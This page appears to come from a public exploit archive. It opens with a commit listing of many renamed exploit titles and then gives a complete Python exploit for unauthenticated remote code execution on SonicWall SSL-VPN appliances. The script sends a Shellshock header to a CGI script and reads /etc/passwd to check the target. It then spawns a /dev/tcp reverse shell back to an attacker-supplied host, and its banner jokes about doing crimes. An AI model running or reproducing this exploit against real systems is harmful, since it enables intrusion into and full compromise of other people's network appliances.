dade976f06
12 changes to exploits/shellcodes Apache - Arbitrary Long HTTP Headers Denial of Service (Perl) Apache - Arbitrary Long HTTP Headers (Denial of Service) Microsoft Internet Explorer - Denial of Service (11 bytes) Microsoft Internet Explorer - Denial of Service Apache - Arbitrary Long HTTP Headers Denial of Service (C) Apache - Arbitrary Long HTTP Headers Denial of Service phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl) phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C) phpBB 2.0.15 - Register Multiple Users (Denial of Service) XChat 2.6.7 (Windows) - Remote Denial of Service (PHP) XChat 2.6.7 (Windows) - Remote Denial of Service (Perl) XChat 2.6.7 (Windows) - Remote Denial of Service Opera 9 IRC Client - Remote Denial of Service (Python) Opera 9 IRC Client - Remote Denial of Service Xfire 1.6.4 - Remote Denial of Service (Perl) Xfire 1.6.4 - Remote Denial of Service Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl) Microsoft Windows - NAT Helper Components Remote Denial of Service Apple CFNetwork - HTTP Response Denial of Service (Ruby) Apple CFNetwork - HTTP Response Denial of Service PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python) PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service PHP Hosting Directory 2.0 - Database Disclosure (Python) PHP Hosting Directory 2.0 - Database Disclosure Ascend R 4.5 Ci12 - Denial of Service (C) Ascend R 4.5 Ci12 - Denial of Service (Perl) Ascend R 4.5 Ci12 - Denial of Service BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python) BulletProof FTP Client 2010 - Buffer Overflow (SEH) RedHat 6.2 Restore and Dump - Local Privilege Escalation (Perl) RedHat 6.2 Restore and Dump - Local Privilege Escalation Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash) Apple Mac OSX Adobe Version Cue - Local Privilege Escalation Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Perl) Apple Mac OSX Adobe Version Cue - Local Privilege Escalation ARPUS/Ce - Local Overflow (setuid) (Perl) ARPUS/Ce - Local Overflow (setuid) Xmame 0.102 - 'lang' Local Buffer Overflow (C) Xmame 0.102 - 'lang' Local Buffer Overflow CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python) CoolPlayer 2.19 - '.Skin' Local Buffer Overflow Browser3D 3.5 - '.sfs' Local Stack Overflow (C) Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl) Browser3D 3.5 - '.sfs' Local Stack Overflow CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python) CastRipper 2.50.70 - '.m3u' Universal Stack Overflow Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation (Python) Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl) Soritong 1.0 - Universal Buffer Overflow (Python) Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python) Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow Soritong 1.0 - Universal Buffer Overflow Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python) Apple Mac OSX 10.8.4 - Local Privilege Escalation BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) (Ruby) BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#) Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP) 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH) (ROP) B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter) B64dec 1.1.2 - Buffer Overflow (SEH Overflow + EggHunter) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH) (ASLR + DEP Bypass) Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP) Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl) Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070) (Python) Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070) 3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl) 3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python) WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl) WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow 3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl) 3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl) OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Python) OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python) Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C) IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow BIND 9.x - Remote DNS Cache Poisoning (Python) BIND 9.x - Remote DNS Cache Poisoning Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python) Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl) EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl) Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow Endian Firewall < 3.0.0 - OS Command Injection (Python) Endian Firewall < 3.0.0 - OS Command Injection AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C) AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl) AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution phpBB 2.0.12 - Change User Rights Authentication Bypass (C) phpBB 2.0.12 - Change User Rights Authentication Bypass Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl) Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP) Maxwebportal 1.36 - 'Password.asp' Change Password (3) Maxwebportal 1.36 - 'Password.asp' Change Password (2) phpStat 1.5 - 'setup.php' Authentication Bypass (Perl) phpStat 1.5 - 'setup.php' Authentication Bypass SimpleBBS 1.1 - Remote Command Execution (C) SimpleBBS 1.1 - Remote Command Execution DataLife Engine 4.1 - SQL Injection (Perl) DataLife Engine 4.1 - SQL Injection (PHP) DataLife Engine 4.1 - SQL Injection cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP) cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (PHP) Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (Perl) Fuzzylime CMS 3.01 - 'poll' Remote Code Execution webSPELL 4.2.0d (Linux) - Local File Disclosure (C) webSPELL 4.2.0d (Linux) - Local File Disclosure Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python) Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python) WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload PHPMailer < 5.2.18 - Remote Code Execution (Bash) PHPMailer < 5.2.18 - Remote Code Execution (PHP) PHPMailer < 5.2.18 - Remote Code Execution PHPMailer < 5.2.18 - Remote Code Execution (Python) PHPMailer < 5.2.18 - Remote Code Execution WordPress Core 4.7.0/4.7.1 - Content Injection (Python) WordPress Core 4.7.0/4.7.1 - Content Injection Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting Online Grading System 1.0 - 'uname' SQL Injection Quick.CMS 6.7 - Remote Code Execution (Authenticated) Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover MyBB Hide Thread Content Plugin 1.0 - Information Disclosure Simple Public Chat Room 1.0 - Authentication Bypass SQLi Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
105 lines
No EOL
4.4 KiB
Python
Executable file
105 lines
No EOL
4.4 KiB
Python
Executable file
# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
|
|
# Exploit Author: Darren Martyn
|
|
# Vendor Homepage: https://www.home-assistant.io/
|
|
# Version: < SMA 8.0.0.4
|
|
# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
|
|
|
|
#!/usr/bin/python
|
|
# coding: utf-8
|
|
# Author: Darren Martyn
|
|
# Credit: Phineas Fisher
|
|
# Notes:
|
|
# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team
|
|
# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
|
|
# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
|
|
# a trivial reverse shell using /dev/tcp.
|
|
# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
|
|
# implementing that is left as an exercise for the reader. I've seen a few approaches, and
|
|
# would be interested in seeing yours.
|
|
# There is another LPE that works only on some models which I also have removed from this.
|
|
# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
|
|
import requests
|
|
import sys
|
|
import telnetlib
|
|
import socket
|
|
from threading import Thread
|
|
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
|
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
|
import time
|
|
|
|
def banner():
|
|
print """
|
|
|
|
88 88
|
|
"" 88
|
|
88
|
|
8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88
|
|
`8b d8' 88 I8[ "" 88 88 "" `Y8 88
|
|
`8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88
|
|
`8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88
|
|
"8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88
|
|
|
|
|
|
|
|
88
|
|
88
|
|
88
|
|
,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba,
|
|
a8" `Y88 a8" "8a a8" "8a 88P' "Y8
|
|
8b 88 8b d8 8b d8 88
|
|
"8a, ,d88 "8a, ,a8" "8a, ,a8" 88
|
|
`"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88
|
|
SonicWall SSL-VPN Appliance Remote Exploit
|
|
Public Release (Jan 2021). Author: Darren Martyn. Credit
|
|
goes to Phineas Fisher for this. Stay inside, do crimes.
|
|
"""
|
|
|
|
def handler(lp): # handler borrowed from Stephen Seeley.
|
|
print "(+) starting handler on port %d" %(lp)
|
|
t = telnetlib.Telnet()
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.bind(("0.0.0.0", lp))
|
|
s.listen(1)
|
|
conn, addr = s.accept()
|
|
print "(+) connection from %s" %(addr[0])
|
|
t.sock = conn
|
|
print "(+) pop thy shell!"
|
|
t.interact()
|
|
|
|
def execute_command(target, command):
|
|
url = target + "/cgi-bin/jarrewrite.sh"
|
|
headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
|
|
r = requests.get(url=url, headers=headers, verify=False)
|
|
return r.text
|
|
|
|
def check_exploitable(target):
|
|
print "(+) Testing %s for pwnability..." %(target)
|
|
output = execute_command(target=target, command="cat /etc/passwd")
|
|
if "root:" in output:
|
|
print "(*) We can continue, time to wreck this shit."
|
|
return True
|
|
else:
|
|
return False
|
|
|
|
def pop_reverse_shell(target, cb_host, cb_port):
|
|
print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
|
|
backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
|
|
execute_command(target=target, command=backconnect)
|
|
|
|
def hack_the_planet(target, cb_host, cb_port):
|
|
if check_exploitable(target) == True:
|
|
pass
|
|
else:
|
|
sys.exit("(-) Target not exploitable...")
|
|
handlerthr = Thread(target=handler, args=(int(cb_port),))
|
|
handlerthr.start()
|
|
pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)
|
|
|
|
def main(args):
|
|
banner()
|
|
if len(args) != 4:
|
|
sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
|
|
hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])
|
|
|
|
if __name__ == "__main__":
|
|
main(args=sys.argv) |